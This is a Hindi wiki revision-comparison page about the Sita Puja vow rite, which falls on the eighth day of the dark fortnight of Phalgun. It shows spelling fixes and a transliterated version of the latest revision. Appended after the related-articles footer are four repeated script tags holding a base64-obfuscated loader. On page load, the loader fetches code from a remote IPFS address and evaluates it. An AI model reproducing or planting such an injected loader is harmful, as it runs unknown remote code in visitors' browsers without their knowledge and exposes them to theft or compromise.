Difference between revisions of "सीता पूजा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (सीतापूजा का नाम बदलकर सीता पूजा कर दिया गया है)
m
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*सीता का अर्थ है 'कर्षत भूमि'।  
 
*सीता का अर्थ है 'कर्षत भूमि'।  
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (518, [[ब्रह्मापुराण]] से उद्धरण)</ref> में आया है कि [[नारद]] के कहने पर [[दक्ष]] के पुत्रों द्वारा [[फाल्गुन]] [[कृष्ण पक्ष]] की [[अष्टमी]] को [[पृथ्वी देवि|पृथ्वी]] मापी गयी थी।
+
*कृत्यरत्नाकर<ref>कृत्यरत्नाकर (518, [[ब्रह्मपुराण]] से उद्धरण</ref> में आया है कि [[नारद]] के कहने पर [[दक्ष]] के पुत्रों द्वारा [[फाल्गुन]] [[कृष्ण पक्ष]] की [[अष्टमी]] को [[पृथ्वी देवी|पृथ्वी]] मापी गयी थी।
 
*अत: देव एवं पितर लोग उस दिन अपूपों (पूओं) के साथ श्राद्ध की अभिलाषा करते हैं।  
 
*अत: देव एवं पितर लोग उस दिन अपूपों (पूओं) के साथ श्राद्ध की अभिलाषा करते हैं।  
 
*[[राम]] की पत्नी [[सीता]] की पूजा करनी चाहिए।
 
*[[राम]] की पत्नी [[सीता]] की पूजा करनी चाहिए।
 
*जो फाल्गुन कृष्ण पक्ष की अष्टमी को उत्पन्न हुई थीं।<ref>कृत्यरत्नाकर (526-529 एवं 518), 'फाल्गुनकृत्य' के अंतर्गत।</ref>
 
*जो फाल्गुन कृष्ण पक्ष की अष्टमी को उत्पन्न हुई थीं।<ref>कृत्यरत्नाकर (526-529 एवं 518), 'फाल्गुनकृत्य' के अंतर्गत।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:59, 6 August 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sita ka arth hai 'karshat bhoomi'.
  • krityaratnakar[1] mean aya hai ki narad ke kahane par daksh ke putroan dvara phalgun krishna paksh ki ashtami ko prithvi mapi gayi thi.
  • at: dev evan pitar log us din apoopoan (poooan) ke sath shraddh ki abhilasha karate haian.
  • ram ki patni sita ki pooja karani chahie.
  • jo phalgun krishna paksh ki ashtami ko utpann huee thian.[2]


tika tippani aur sandarbh

  1. krityaratnakar (518, brahmapuran se uddharan
  2. krityaratnakar (526-529 evan 518), 'phalgunakrity' ke aantargat.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>